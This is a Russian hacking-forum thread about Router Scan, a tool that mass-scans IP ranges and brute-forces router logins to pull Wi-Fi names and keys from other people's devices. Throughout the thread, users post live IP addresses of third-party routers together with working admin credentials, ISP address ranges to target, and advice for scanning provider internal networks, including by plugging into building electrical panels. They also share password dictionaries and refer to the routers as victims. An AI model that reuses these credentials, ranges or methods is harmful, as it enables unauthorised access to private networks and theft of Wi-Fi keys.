Ну а ещё, как один из "экстремальных" вариантов, найти Ethernet порты в электрощитах этажа/подъезда/подвала, подключиться и сканировать оттуда

Triton_Mgn
31.07.2015, 23:12
binarymaster , возможно ли сделать какой либо отсеиватель ip камер? В поиск же не забъешь все ----camera ----dcs и т.д. Имеется ввиду какие Вам известны камеры и есть 4-я колонка в Router scan.

Datak1ng
01.08.2015, 05:52
Теоретически. Диапазоны внутренней сети могут быть разные, для получения большей информации можно использовать трассировку (где-то выше я писал об этом).

Ну а ещё, как один из "экстремальных" вариантов, найти Ethernet порты в электрощитах этажа/подъезда/подвала, подключиться и сканировать оттуда


предположим у меня есть доступ к щитам сканировать оттуда нужно по каким адресам ?)

melan
01.08.2015, 12:07
предположим у меня есть доступ к щитам сканировать оттуда нужно по каким адресам ?



По внутри сетевым адресам провайдера. (если таковы имеются)

Datak1ng
01.08.2015, 18:05
По внутри сетевым адресам провайдера. (если таковы имеются)



10.0.0.0/8 ?

binarymaster
01.08.2015, 19:21
Я же ответил выше... Да, это один из вариантов. Пробуйте, экспериментируйте, гарантий в этой области никто не даст, ибо доступ только у вас.

Ossen
02.08.2015, 05:03
Кстати часть TP Link ов которые нормально отображались в бета версии программы сейчас либо вообще не обозначаются либо присутствует только название модели и больше ничего ни ESSID ни mac в финальной версии роутерскана не отображает ( модели в основном из 841 серии) PS пароли к веб интерфейсам этих тп линков отлично подходят такие admin 15011974 и s15011974 .

binarymaster
02.08.2015, 18:15
Кстати часть TP Link ов которые нормально отображались в бета версии программы сейчас либо вообще не обозначаются либо присутствует только название модели и больше ничего



IP-адреса в студию! За пароли спасибо, может найду.

-bI-
02.08.2015, 18:40
Пароли частные, 15 января 1974г., никуда не годятся.

Ossen
02.08.2015, 19:19
IP-адреса в студию! За пароли спасибо, может найду.



Пожалуйста http://79.173.113.126:8080/ http://79.173.118.60:8080/

http://79.173.114.65:8888/

Ossen
02.08.2015, 20:14
ну а так они отображаются в скане https://yadi.sk/i/Xd-OzDjZiE6c8 https://yadi.sk/i/Xd-OzDjZiE6c8

binarymaster
02.08.2015, 21:09
ну а так они отображаются в скане



Значит, по какой-то причине авторизация на вашей стороне не проходит. Копайте в сторону словарей, ещё можно при помощи Charles запроксировать и посмотреть запросы Router Scan к роутеру.

http://s7.hostingkartinok.com/uploads/thumbs/2015/08/6dfe9f82d6c13bd83baa76d37bb2cb9d.png

Algierd
02.08.2015, 21:13
А кто из Беларуси? У меня перебор байфлаевского диапазона всей РБ чуть больше 300 успешно найденных роутеров. Как-то не густо совсем... У них такие хорошие админы или это у меня руки просто недостаточно прямые?

Ossen
02.08.2015, 22:00
Значит, по какой-то причине авторизация на вашей стороне не проходит. Копайте в сторону словарей, ещё можно при помощи Charles запроксировать и посмотреть запросы Router Scan к роутеру.

http://s7.hostingkartinok.com/uploads/thumbs/2015/08/6dfe9f82d6c13bd83baa76d37bb2cb9d.png


разобрался в словарях "косяк" был

djamv
03.08.2015, 00:18
ткните носом на пост где написано как сделать трасировку чтобы узнать все локальные подсети у провайдера

VladimirV
03.08.2015, 00:23
А кто из Беларуси? У меня перебор байфлаевского диапазона всей РБ чуть больше 300 успешно найденных роутеров. Как-то не густо совсем... У них такие хорошие админы или это у меня руки просто недостаточно прямые?



Недавно сканировал. Гудов мало (даже очень мало). В подсети пролезть пока не пробовал.

VladimirV
03.08.2015, 00:27
Посмотрел статистику 3WiFi, admin:rombik1 скоро будет на первом месте!

binarymaster
03.08.2015, 01:02
ткните носом на пост где написано как сделать трасировку чтобы узнать все локальные подсети у провайдера



Справа от названия темы есть поле ввода, которое служит для поиска по теме. Почему бы не воспользоваться им?

https://forum.antichat.ru/posts/3680691

https://forum.antichat.ru/posts/3724030

https://forum.antichat.ru/posts/3871499

VladimirV
03.08.2015, 01:26
Еще про IP.

Стало мне скучно сканировать провайдеров, города, страны. И качал я фильм с RUTORa (допустим что с него), пиров было за 10 000. И взял я IP этих пиров, удалил порты, добавил к каждому IP диапазон 255, отсортировал, и получил кучу IP c нормальным гудом в RouterScan. Было много IP из подсети провайдера.

Datak1ng
03.08.2015, 10:51
Еще про IP.

Стало мне скучно сканировать провайдеров, города, страны. И качал я фильм с RUTORa (допустим что с него), пиров было за 10 000. И взял я IP этих пиров, удалил порты, добавил к каждому IP диапазон 255, отсортировал, и получил кучу IP c нормальным гудом в RouterScan. Было много IP из подсети провайдера.



А как ты понял что они из твоей подсети, если ты сканировал внешние ip ?

henri2002
03.08.2015, 13:24
подскажите какие порты в турции.

некоторое время назад, попадалась инфа, что отличаются от наших, сейчас не могу найти ту инфу.

yurasena
03.08.2015, 13:40
Кто-нибудь знает диапазон IP адресов Dom.ru (ЭР Телеком) Санкт-Петербурга? Перелопатил поисковики, нашёл только диапазон Нижнего Новгорода...

kadet
03.08.2015, 21:22
Кто-нибудь знает диапазон IP адресов Dom.ru (ЭР Телеком) Санкт-Петербурга? Перелопатил поисковики, нашёл только диапазон Нижнего Новгорода...



5.164.64.0/18 RU CJSC "ER-Telecom Holding" Saint-Petersburg branch

5.166.128.0/19 RU CJSC "ER-Telecom Holding" Saint-Petersburg branch

109.195.80.0/20 RU CJSC "ER-Telecom Holding" Saint-Petersburg branch

188.187.0.0/17 RU CJSC "ER-Telecom Holding" Saint-Petersburg branch

188.187.234.0/24 CJSC "ER-Telecom Holding" Saint-Petersburg branch

C0D3BR34K3R
04.08.2015, 00:24
binarymaster

не парсит ESSID & Key на асусах с древней прошивкой, например:

http://admin:[email protected]:80

не парсит BSSID на юбиквити, например:

http://77.41.2.151

binarymaster
04.08.2015, 15:49
Парсер AirOS уже обновил, BSSID обрабатывается корректно. ASUS сейчас сделаю...

UPD: сделал. Прошивка отнюдь не старая, а как раз довольно свежая, просто сигнатура не совпала (должен был определиться как ASUS Black).

kadet
04.08.2015, 17:57
Ааа про Good found:0 говорили уже ??? Всегда остается 0 не зависимо от того нашел он или нет роутеры)

ChesteRock
04.08.2015, 18:34
Ааа про Good found:0 говорили уже ??? Всегда остается 0 не зависимо от того нашел он или нет роутеры)



Там в настройках "Turn off Good results table generation" нужно снять галку.

Я заметил другой баг. Часто счетчик перестает считать. Может быть связано с частым нажатием кнопки паузы или изменением Max. Threads.

binarymaster
05.08.2015, 05:44
http://s7.hostingkartinok.com/uploads/thumbs/2015/08/986325e5d954a22b60505daa013e9662.png

То чувство, когда раскусил все тайные пароли провайдера...

Ossen
05.08.2015, 05:45
http://s7.hostingkartinok.com/uploads/thumbs/2015/08/986325e5d954a22b60505daa013e9662.png

То чувство, когда раскусил все тайные пароли провайдера...


Какая красота ) Судя по скриншоту уже следующая бета на подходе?

gentux
05.08.2015, 08:10
Пикча с программой версии 2.53 beta



Не скажите когда релиз.

zimmer
05.08.2015, 14:47
http://31.40.143.196/ логин и пасс admin

в роутерскане не подбирает пароль к ним, отображается только в столбце имени Router Webserver (Login Incorrect)

сам роутер (не единичный случай именно с этим роутером) tp-link Модель № TL-WR740N

C0D3BR34K3R
05.08.2015, 15:15
http://s7.hostingkartinok.com/uploads/thumbs/2015/08/986325e5d954a22b60505daa013e9662.png

То чувство, когда раскусил все тайные пароли провайдера...


перебор паролей по маске будет в новой версии доступен?

или это уже было реализовано в предыдущих?



http://31.40.143.196/ логин и пасс admin

в роутерскане не подбирает пароль к ним, отображается только в столбце имени Router Webserver (Login Incorrect)

сам роутер (не единичный случай именно с этим роутером) tp-link Модель № TL-WR740N



это глюк прошивки роутера

если логиниться из браузера - тоже сначала пишет ошибку

но после обновления страницы - нормально заходит в админку

binarymaster
05.08.2015, 16:38
Какая красота ) Судя по скриншоту уже следующая бета на подходе?






Не скажите когда релиз.



Очень скоро! Вообще говоря, не хватает подробной документации именно по функционалу, т.е. какая кнопка и опция за что отвечает, и на что это может влиять. Я был бы очень рад, если кто-нибудь написал бы её, подкрепив скриншотами, и чтобы всё это засунуть в HTMLник с документацией, прилагаемой к программе. Я бы потом подкорректировал неточности.

Кстати, добавил интеграцию с 3WiFi, можно будет выгружать данные прямо из программы.



перебор паролей по маске будет в новой версии доступен?

или это уже было реализовано в предыдущих?



Вот честно, не помню, когда я добавил эту фичу. Скажу лишь, что доступны только эти переменные -

%i# - подставляет октет адреса IPv4

%iz# - аналогично, но ещё дополняет нулями слева до длины 3-х символов

Других переменных пока нет, и оно работает только в контексте этой функции (для словарей basic/digest не работает).



в роутерскане не подбирает пароль к ним, отображается только в столбце имени Router Webserver (Login Incorrect)

сам роутер (не единичный случай именно с этим роутером) tp-link Модель № TL-WR740N






это глюк прошивки роутера

если логиниться из браузера - тоже сначала пишет ошибку

но после обновления страницы - нормально заходит в админку



Подтверждаю, у меня Router Scan сейчас с первого раза авторизовался и отпарсил его.

djamv
05.08.2015, 21:44
binarymaster, Router scan режет часть BSSID'a в роутерах ASUS. >> Все бы ничего, но у 3х локальных провайдеров много сетей с подобным именем. Собирайю базу для 3wifi, т.к у меня есть доступ к этим локалкам.

http://hostingkartinok.com/show-image.php?id=a4b3ecf399b817ccf8a838f7348aa404

Только что проверил, с ASUS RT-G32 Rev.C1 парсит корректно. Только на ASUS RT-N10E такая беда

binarymaster
05.08.2015, 22:52
Router scan режет часть BSSID'a в роутерах ASUS. <<<_777_ , <<<_ASUS_ , <<<_BARSIK_ Там не хватает еще >>> Только на ASUS RT-N10E такая беда



О как... вероятно, роутер не преобразует эти символы, а должен бы по идее. Можете слить исходник страницы /wlbasic.asp одного из таких устройств? Попробую поправить.

djamv
05.08.2015, 23:04
О как... вероятно, роутер не преобразует эти символы, а должен бы по идее. Можете слить исходник страницы /wlbasic.asp одного из таких устройств? Попробую поправить.



http://zalil.su/504115

Просканил еще одну подсеть, все тот же роутер с такой же проблемой.

djamv
06.08.2015, 01:11
еще заметил что на новых прошивках от tp-link есть ограничение на попытку авторизации в веб морду

скрин http://firepic.org/?v=6.2015-08-06_8b1ptyje54gr.png

binarymaster
06.08.2015, 03:32
Router scan режет часть BSSID'a в роутерах ASUS. <<<_777_ , <<<_ASUS_ , <<<_BARSIK_ Там не хватает еще >>>



Исправил.

startless
06.08.2015, 12:46
А кто из Беларуси? У меня перебор байфлаевского диапазона всей РБ чуть больше 300 успешно найденных роутеров. Как-то не густо совсем... У них такие хорошие админы или это у меня руки просто недостаточно прямые?



Этой зимой как-то сканил, открылось больше 2200 точек. Результаты сохранил если что...

pte273
06.08.2015, 16:04
Здравствуйте,не могу разобраться что и где надо настроить для доступа и сканирования городской сети деапозон ip узнал с помощью tracert просканировал но там ничего знакомого видать доступа нет что делать?Спасибо.

zimmer
07.08.2015, 14:17
посмотри свой айпишник и уже от него стреляй, например если у тебя 10.12.12.12 то резнно было бы просканировать 10.12.0.0\16 или 10.12.12.0\24

pte273
07.08.2015, 18:46
Все пробовал но безрезультатно может ли правайдер как то блокировать скан ip?Да и по темже проводам провайдер предостовляет просмотр TV через приставку или САМ-модуль.Может ли это как то повлиять?

zimmer
07.08.2015, 19:47
Все пробовал но безрезультатно может ли правайдер как то блокировать скан ip?Да и по темже проводам провайдер предостовляет просмотр TV через приставку или САМ-модуль.Может ли это как то повлиять?



выложи сюда результат ipconfig у себя, а так то провайдер может при установке настраивать роутер чтоб доступ был только из 192.168.*.*

binarymaster
07.08.2015, 20:19
Все пробовал но безрезультатно может ли правайдер как то блокировать скан ip?Да и по темже проводам провайдер предостовляет просмотр TV через приставку или САМ-модуль.Может ли это как то повлиять?



Конечно может блокировать. IPTV обычно не влияет.



выложи сюда результат ipconfig у себя, а так то провайдер может при установке настраивать роутер чтоб доступ был только из 192.168.*.*



Не только ipconfig, но и...


tracert -d -w 50 -h 5 8.8.8.8
tracert -d -w 50 -h 5 10.0.0.1
tracert -d -w 50 -h 5 172.16.0.1
tracert -d -w 50 -h 5 192.168.100.1
tracert -d -w 50 -h 5 100.64.0.1
Это даст наиболее полную картину.

И если есть root-доступ к роутеру, ifconfig оттуда.

zimmer
07.08.2015, 20:25
binarymaster, такой вопрос, судя по скринам - имеется бэтка роутерскана - так почему бы не выложить потестировать всем миром?))))

и ещё вопрос немного не по теме, но всеже:

в найденных роутерах пытаюсь по бссид сделать геопозиционирование (в частности тут https://api.mylnikov.org/wifi/main.py/get?bssid=04:8d:38:2a:f8:54&v=1.1), но есть небольшое но, некоторые роутеры определяются что они где-то в пекине или ещё где, хотя я точно знаю что они в моём городе.. собственно сам вопрос: почему так?

напрашивается ответ что в пекине роутер стоит с таким же маком - вот его и находит там, но может есть другое объяснение?....

pte273
07.08.2015, 20:47
http://http://s58.radikal.ru/i162/1508/52/22c926de82a7t.jpg (http://radikal.ru/fp/25818f1ab025480eba3309eb9478a2d3) Вот скрин

pte273
07.08.2015, 20:52
http://s58.radikal.ru/i162/1508/52/22c926de82a7.png

binarymaster
07.08.2015, 20:57
http://http://s58.radikal.ru/i162/1508/52/22c926de82a7t.jpg (http://radikal.ru/fp/25818f1ab025480eba3309eb9478a2d3) Вот скрин



Во-первых, скрин сломался (правда я всё равно его увидел). Во-вторых, давайте в текстовом виде вывод всех команд, что я выше перечислил - на скриншоте вывод только одной команды.

zimmer
07.08.2015, 20:59
pte273

109.239.46.0/23 - сканируй этот диапозон

скрин вот

http://s58.radikal.ru/i162/1508/52/22c926de82a7.png

binarymaster
07.08.2015, 21:02
109.239.46.0/23 - сканируй этот диапозон



Это внешний диапазон, интересуют внутренние.

Пациент предоставил недостаточно данных, не всех команд

zimmer
07.08.2015, 21:07
Это внешний диапазон, интересуют внутренние.

Пациент предоставил недостаточно данных, не всех команд


у них интернет (алманет) насколько я знаю по коаксилке протянут, да и роутеры соответственно специфичные...




Thomson_V2.2.5

Terayon TJ 715

Terayon TA102

Motorola SB5101

Motorola SB5010

pte273
07.08.2015, 21:11
Можно уточнить команды?

zimmer
07.08.2015, 21:31
Можно уточнить команды?


tracert -d -w 50 -h 5 8.8.8.8

tracert -d -w 50 -h 5 10.0.0.1

tracert -d -w 50 -h 5 172.16.0.1

tracert -d -w 50 -h 5 192.168.100.1

tracert -d -w 50 -h 5 100.64.0.1

по очереди вводи в консоли...

pte273
07.08.2015, 21:33
Нет



у них интернет (алманет) насколько я знаю по коаксилке протянут, да и роутеры соответственно специфичные...


<br/>
Thomson_V2.2.5<br/>
<br/>
<br/>
Terayon TJ 715<br/>
<br/>
<br/>
Terayon TA102<br/>
<br/>
<br/>
Motorola SB5101<br/>
<br/>
<br/>
Motorola SB5010



Нет такой стоит.

Маршрутизатор TP-Link TL-WR740N

zimmer
07.08.2015, 21:42
зайди в роутер и посмотри во вкладке "сеть" какой айпишник стоит в строке

IP-адрес/Имя сервера:

IP-адрес: *.*.*.* вот тут...

+ посмотри какие настройки стоят во вкладке безопасность - удаленное управление и локальное управление...

zimmer
07.08.2015, 21:43
а где в бетке словари?



замени два файла в папке с предидущей версией просто и все...

pte273
07.08.2015, 21:45
tracert -d -w 50 -h 5 8.8.8.8

tracert -d -w 50 -h 5 10.0.0.1

tracert -d -w 50 -h 5 172.16.0.1

tracert -d -w 50 -h 5 192.168.100.1

tracert -d -w 50 -h 5 100.64.0.1

по очереди вводи в консоли...



Вотhttp://s020.radikal.ru/i708/1508/ae/87718f1b8a5e.png

RomanxD
07.08.2015, 21:58
binarymaster,

со шрифтом можно это поправить?

http://s019.radikal.ru/i634/1508/53/997402cf754a.jpg

Исходный код страницы:

http://rghost.ru/8cHzHCFvP

pte273
07.08.2015, 22:04
зайди в роутер и посмотри во вкладке "сеть" какой айпишник стоит в строке

IP-адрес/Имя сервера:

IP-адрес: *.*.*.* вот тут...

+ посмотри какие настройки стоят во вкладке безопасность - удаленное управление и локальное управление...



http://s014.radikal.ru/i328/1508/df/01c249b55f8b.png http://s020.radikal.ru/i702/1508/6b/7f8b038f646a.png http://s018.radikal.ru/i527/1508/63/d124af590229.png

TOX1C
07.08.2015, 23:05
нету внутренной сети у провайдера, только нормальные, внешние ip

pte273
07.08.2015, 23:19
нету внутренной сети у провайдера, только нормальные, внешние ip



Почему тогда scan не видит не чего на этом ip?

TOX1C
07.08.2015, 23:27
потому что на роутерах потушен доступ извне. так бывает.

pte273
07.08.2015, 23:32
потому что на роутерах потушен доступ извне. так бывает.



Что настроить чтоб доступ появился?

binarymaster
07.08.2015, 23:52
Вот



Подтверждаю, внутренних диапазонов нет (либо они какие-то особые, либо маршруты надо вручную прописывать). Чтобы TP-LINK сканировался извне, нужно разрешить доступ - по умолчанию он отключён.

Так что, по-минимуму, ваши диапазоны таковы:


46.36.128.0 - 46.36.159.255
109.239.32.0 - 109.239.47.255
81.88.144.0 - 81.88.159.255




Что настроить чтоб доступ появился?



А это уже не сюда, читайте руководство эксплуатации роутера. Почти во всех TP-LINKах оно включается одинаково.

binarymaster
08.08.2015, 00:02
binarymaster,

со шрифтом можно это поправить?

http://s019.radikal.ru/i634/1508/53/997402cf754a.jpg

Исходный код страницы:

http://rghost.ru/8cHzHCFvP



Не шрифт, а кодировка. Это внутренний ресурс провайдера? Исходный код страницы в Win-1251, теги говорят о том же. Но данные получены в кодировке UTF-8. Следовательно, либо хост отдаёт данные в неверной кодировке, либо где-то закрался баг. Нужен живой образец...



Думаю было бы не плохо реализовать автосохранение прямо в базу 3wifi и включить по дефолту.



Да, можно, но при первом запуске нужно будет задавать вопрос - согласен ли пользователь с автоматической отправкой. И с дальнейшей возможностью включать/выключать это. Иначе претензии будут.

pte273
08.08.2015, 00:04
Подтверждаю, внутренних диапазонов нет (либо они какие-то особые, либо маршруты надо вручную прописывать). Чтобы TP-LINK сканировался извне, нужно разрешить доступ - по умолчанию он отключён.

Так что, по-минимуму, ваши диапазоны таковы:


46.36.128.0 - 46.36.159.255
109.239.32.0 - 109.239.47.255
81.88.144.0 - 81.88.159.255



Вот прочитал и понял что видать не сутьба http://vk.com/topic-8458649_28977108

Ossen
08.08.2015, 13:51
доступ на роуте включать на своём или на точках-жертв должен быть включён? чтоб rout scan их нашёл.



Должен быть на роутерах "жертв" включен

XAMRAS
08.08.2015, 23:56
http://3wifi.tk/stat.php

Добавьте:

Данные авторизации

djamv
09.08.2015, 04:49
http://95.158.12.106:8080 admin:admin не определяет данный роутер в программе.

binarymaster
09.08.2015, 16:23
http://95.158.12.106:8080 admin:admin не определяет данный роутер в программе.



http://s7.hostingkartinok.com/uploads/thumbs/2015/08/73fe3276c276a3925da4dd6ad2528166.png

Ossen
09.08.2015, 16:40
http://s7.hostingkartinok.com/uploads/images/2015/08/f65ed55a35e57745c19857221c514240.png



http://s7.hostingkartinok.com/uploads/thumbs/2015/08/73fe3276c276a3925da4dd6ad2528166.png[/

и нормально в веб интерфейс пускаетhttp://s7.hostingkartinok.com/uploads/images/2015/08/d3a19eed15a3d5d944539b9fdbd9f941.png

binarymaster
09.08.2015, 17:56
Да, сейчас заработало.

Добавил. Как и ожидалось, самая обычная прошивка на базе Ralink. Правда выход как-то криво работает.

Ossen
09.08.2015, 18:16
Да, сейчас заработало.

Добавил. Как и ожидалось, самая обычная прошивка на базе Ralink. Правда выход как-то криво работает.



Есть ещё ZTE с аналогичной проблемой http://79.173.113.5:80

http://79.173.125.102:80

djamv
09.08.2015, 18:59
и еще один роутер 77.52.68.240:80 admin:admin

77.52.33.224:80 admin:admin

Два одинаковых.

valokorden
09.08.2015, 19:49
Есть ещё ZTE с аналогичной проблемой http://79.173.113.5:80

http://79.173.125.102:80



Супер китайские роутеры, наверно мощность 5Вт))))))))

RomanxD
09.08.2015, 20:21
Не шрифт, а кодировка. Это внутренний ресурс провайдера? Исходный код страницы в Win-1251, теги говорят о том же. Но данные получены в кодировке UTF-8. Следовательно, либо хост отдаёт данные в неверной кодировке, либо где-то закрался баг. Нужен живой образец...



Путанул, что шрифт написал. Это внутренний ресурс, с образцом не получится.

Вроде этот код должен нормально отображать кодировку:

PHP:



functionRussianToUnicode(S:String):String;

var
Wrd:Word;
Len:Integer;
pW,pR:PWord;
begin

pW:= @S[1];
Len:=Length(S);
SetLength(Result,Len);
pR:= @Result[1];

whileLen<>0do
begin

Wrd:=pW^;

caseWrd of

$C0..$DF,$E0..$FF:pR^:=Wrd+ $0350;

elsepR^:=Wrd;
end;
Inc(pW);
Inc(pR);
Dec(Len);
end;
end;

binarymaster
09.08.2015, 23:12
Есть ещё ZTE с аналогичной проблемой http://79.173.113.5:80

http://79.173.125.102:80



Проблема отнюдь не аналогичная, просто эта прошивка не поддерживалась.

ZTE ZXHN E5501 добавлен.



и еще один роутер 77.52.68.240:80 admin:admin

77.52.33.224:80 admin:admin

Два одинаковых.



Парсер EVDO 3G уже есть, сигнатуры определения обновил.



Путанул, что шрифт написал. Это внутренний ресурс, с образцом не получится.

Вроде этот код должен нормально отображать кодировку:



Плохой код... не все символы правильно сможет декодировать. Ведь есть встроенная функция UTF8Decode! Но вопрос не в том, декодировать или нет, а почему данные пришли в этой кодировке, когда должны были в другой.

Ossen
10.08.2015, 00:01
Есть ещё и такой "фрукт" d link http://79.173.112.202:8080 с уже стандартной парой admin: s15011974

ChesteRock
10.08.2015, 00:58
Проблема отнюдь не аналогичная, просто эта прошивка не поддерживалась.

ZTE ZXHN E5501 добавлен.



Жаль в бете так и не появилась полноценная поддержка MikroTik. Есть какие-то успехи с ними?

binarymaster
10.08.2015, 03:22
Жаль в бете так и не появилась полноценная поддержка MikroTik. Есть какие-то успехи с ними?



Они поддерживаются, но не все версии прошивок. С каждой прошивкой параметры для парсинга меняются.

ChesteRock
10.08.2015, 11:31
Они поддерживаются, но не все версии прошивок. С каждой прошивкой параметры для парсинга меняются.



Ни один из списка

http://s019.radikal.ru/i640/1508/2b/86c6a8b2d98dt.jpg

А их на провайдере, наверное, больше всего

http://s020.radikal.ru/i702/1508/8b/47436bd0f869t.jpg

C0D3BR34K3R
10.08.2015, 11:38
binarymaster

заметил такой баг с импортом .csv:

добавляем комментарии, экспортируем результаты в .csv

комменты в файл сохраняются, но если опять импортировать этот же файл,

то колонка с комментариями будет уже пуста

и еще, можно ли в программе сделать такую опцию, чтобы в файл экспортировались только видимые столбцы?

и соответственно, чтобы потом можно было импортировать этот файл обратно в программу без как-либо косяков, связанных с неправильным размещением результатов по столбцам.

Algierd
10.08.2015, 16:58
Этой зимой как-то сканил, открылось больше 2200 точек. Результаты сохранил если что...



Выложи на RGHost если не трудно?

У кого есть полный диапазон для Атлант Телекома?

binarymaster
10.08.2015, 18:48
Есть ещё и такой "фрукт" d link http://79.173.112.202:8080 с уже стандартной парой admin: s15011974



Страница не прогружается толком у меня.



Ни один из списка

А их на провайдере, наверное, больше всего



Авторизация должна на всех работать. Выше я имел в виду парсинг параметров. Значит все стандартные пароли изменены.



заметил такой баг с импортом .csv:

добавляем комментарии, экспортируем результаты в .csv

комменты в файл сохраняются, но если опять импортировать этот же файл,

то колонка с комментариями будет уже пуста



Подтверждаю, исправил баг.



и еще, можно ли в программе сделать такую опцию, чтобы в файл экспортировались только видимые столбцы?

и соответственно, чтобы потом можно было импортировать этот файл обратно в программу без как-либо косяков, связанных с неправильным размещением результатов по столбцам.



Реализовать для CSV можно, для TXT не получится (только если сохранять ещё названия столбцов). Но я считаю, что это внесёт путаницу и возможные случайные потери нужной информации, поэтому оставлю это на совести пользователя с Excel-ем.

Ossen
11.08.2015, 00:51
Страница не прогружается толком у меня.



проверил нормально грузится

Shimura
11.08.2015, 17:28
Сегодня бета 253 на несколько минут остановилась на "Checking available APs for uploading, please wait...". Я уж думал зависла... Раньше этот этап быстро проходил

C0D3BR34K3R
11.08.2015, 19:44
кто это постоянно долбит все роутеры с адреса 5.104.175.234?

XAMRAS
11.08.2015, 20:23
176.214.159.129

Логин:admin

Пароль:admin

В Router Scan пишет:

http://s017.radikal.ru/i439/1508/78/3d8b6cce9809.jpg

На 3wifi.tk добавил путем редактирования файла.

Ossen
11.08.2015, 21:24
В dev-сборке уже работает,



а где эта dev? Если это последняя бетка то ZTE как отображалось так и отображается без bssid essid итп

C0D3BR34K3R
11.08.2015, 22:25
Кстати, часто нахожу ASUSы с заблокированным веб интерфейсом, входы с Болгарских IP-адресов.



мало того, этот паразит еще подменяет днс-ы на 93.170.123.24 , 89.108.70.63



Чей-то дедик, инфа 100%.



на IIS юзает роутерскан, гад

binarymaster
11.08.2015, 23:06
а где эта dev? Если это последняя бетка то ZTE как отображалось так и отображается без bssid essid итп



Dev-сборка - это самая свежая сборка, которая есть только у меня Иногда я их выкладываю, текущая публичная бета уже не первой свежести.

Ossen
11.08.2015, 23:10
Иногда я их выкладываю, текущая публичная бета уже не первой свежести



может поделитесь заценим

binarymaster
11.08.2015, 23:22
может поделитесь заценим



Там осталось прикрутить ещё немного фич, и будет релиз.

А ещё я жду, что кто-нибудь запилит мануал

eu8cc
11.08.2015, 23:26
Поделитесь и со мной пожалуйста dev-сборкой.

binarymaster
12.08.2015, 00:24
Какие маршрутизаторы пробиваются тулзой с поддержкой PPTP VPN-сервера?



"Пробиваются" в основном ASUS.

Ещё возможно добыть DD-WRT и Mikrotik. Ну и Wive-NG с его L2TP на закуску.

C0D3BR34K3R
12.08.2015, 10:21
кто-то массово атакует роутеры асус с 3-й версией прошивки

и меняет пароли на rombik1 и днс-ы на 93.170.123.24 , 89.108.70.63 , 69.64.62.109

ip атакующего: 5.104.175.234 , 78.128.92.203 , 46.38.51.210

Danilka
12.08.2015, 12:06
"Пробиваются" в основном ASUS.

Ещё возможно добыть DD-WRT и Mikrotik. Ну и Wive-NG с его L2TP на закуску.



Объясните пожалуйста как или чем настраивать впн на таких роутерах. Есть у меня ддврт у подруги стоит в другом городе ), но я хожу через него с помощью ssh тунеля, а вот как впн настраивать так никак не могу понять

Triton_Mgn
12.08.2015, 14:20
На роутере Micro DSL (96328A-1341N1 | A741-S406QTH-C02 R05.B2pD032c.d23e) именно модель где буква S перед 406 , коряво отображается BSSID - вот такой 00:1F:CE:55:72:41, можно убрать всю эту лишнюю писанину? ip 188.18.232.107 -- admin:rombik1. Причем у всех так где буква S, что подумает 3wifi.tk прожевав такую таблицу CSV.

Ossen
12.08.2015, 14:21
впн настраивать так никак не могу понять



вот это то и болезнь dd wrt всё зависит от прошивки и модели роутера часто получается так что в одной сборке (прошивки) вроде всё работает но впн не запустить а в другой сборке впн запускается но возникает какая нибудь другая проблема одна из распространённых начинает резать скорость вариантов много ) а настроить там в принципе не сложно мануалов в сети достаточно

binarymaster
12.08.2015, 16:36
На роутере Micro DSL (96328A-1341N1 | A741-S406QTH-C02 R05.B2pD032c.d23e) именно модель где буква S перед 406 , коряво отображается BSSID - вот такой &lt;!-- можно убрать всю эту лишнюю писанину? ip 188.18.232.107 -- admin:rombik1.



Конечно можно и нужно. Исправил.



Причем у всех так где буква S, что подумает 3wifi.tk прожевав такую таблицу CSV.



3WiFi проглотит и не подавится Я это конечно всё промодерирую, подкорректирую.

CRACK211
12.08.2015, 17:27
176.124.226.233 8080 3078 Timed out TP-LINK TL-WR841N

176.124.226.234 8080 94 Done TP-LINK TL-WR841N

176.124.226.235 8080 141 Done TP-LINK TL-WR841N (locked for 2 hours)

176.124.226.243 8080 94 Done TP-LINK TL-WR740N

эти не поддерживаются?

Ossen
12.08.2015, 18:37
эти не поддерживаются?



вроде поддерживаются в словарике auth_basic.txt добавьте пару admin 15011974 и admin s15011974

CRACK211
12.08.2015, 18:56
просто какие то подбирает какие то нет думал может прошивка разная. а можно добавить кнопку рескан для всех точек после оканчания сканирования которые не успели подобраться(TIME out)? А то бывает вручную нажмешь рескан и опа еще несколько Гудов)

Triton_Mgn
12.08.2015, 21:45
Обнаружил странную фичу поменял пароль admin:admin на роутере для проверки на admin:nimdan, внес его в словарь auth_basic.txt Роутер Upvel UR-315BN, Router Scan не может найти пароль . Ставлю галку в Use credentials и там прописываю правильный пароль, все нормально находит, как так?

binarymaster
12.08.2015, 22:34
Вообще-то уже сейчас можно выбрать несколько точек в таблице, методом Ctrl+Shift+клик, и нажать Ctrl+R для пересканирования. Насчёт автоматического выбора может придумаю что-нибудь.

VladimirV
12.08.2015, 22:59
Обнаружил странную фичу поменял пароль admin:admin на роутере для проверки на admin:nimdan, внес его в словарь auth_basic.txt Роутер Upvel UR-315BN, Router Scan не может найти пароль . Ставлю галку в Use credentials и там прописываю правильный пароль, все нормально находит, как так?



Программу перезагрузили?

admin:nimdan добавили через TAB? (admin nimdan)

Triton_Mgn
12.08.2015, 23:07
Программу перезагрузили?

admin:nimdan добавили через TAB? (admin nimdan)



Да действительно мой косяк, добавлял не через TAB. Добавьте в мануал пункт 2.5, что пару в словарь необходимо добавлять через TAB.

binarymaster
12.08.2015, 23:33
Добавьте в мануал пункт 2.5, что пару в словарь необходимо добавлять через TAB.



Ну а для кого я это писал..?)

http://s7.hostingkartinok.com/uploads/thumbs/2015/08/4a73851ad110f1c926e89527202b5d3f.png

ChesteRock
13.08.2015, 11:50
Почему продолжается скан когда вся информация уже извлечена с роутера?

Triton_Mgn
13.08.2015, 13:38
Почему продолжается скан когда вся информация уже извлечена с роутера?



Предоставте скрин , Router Scan работает в нескольких режимах это -раз-два-три. Когда информация извлечена есть кнопа стоп- быстрый стоп. Если первый не прошел включается второй, и до конца и тд

ChesteRock
13.08.2015, 15:38
Предоставте скрин , Router Scan работает в нескольких режимах это -раз-два-три. Когда информация извлечена есть кнопа стоп- быстрый стоп. Если первый не прошел включается второй, и до конца и тд



http://s020.radikal.ru/i700/1508/3c/2f87fd1a51a2t.jpg

Triton_Mgn
13.08.2015, 18:07
http://s020.radikal.ru/i700/1508/3c/2f87fd1a51a2t.jpg


Осталось ответить Вам на один вопрос , зачем ставить галку в Scaning modules -SQLite Manager RCE? Или вы просто отметили все?

Тогда объясните все пункты 1 Router scan (main)

2 Detect proxy servers

3 Use hnap и т.д

binarymaster
13.08.2015, 19:21
http://s020.radikal.ru/i700/1508/3c/2f87fd1a51a2t.jpg


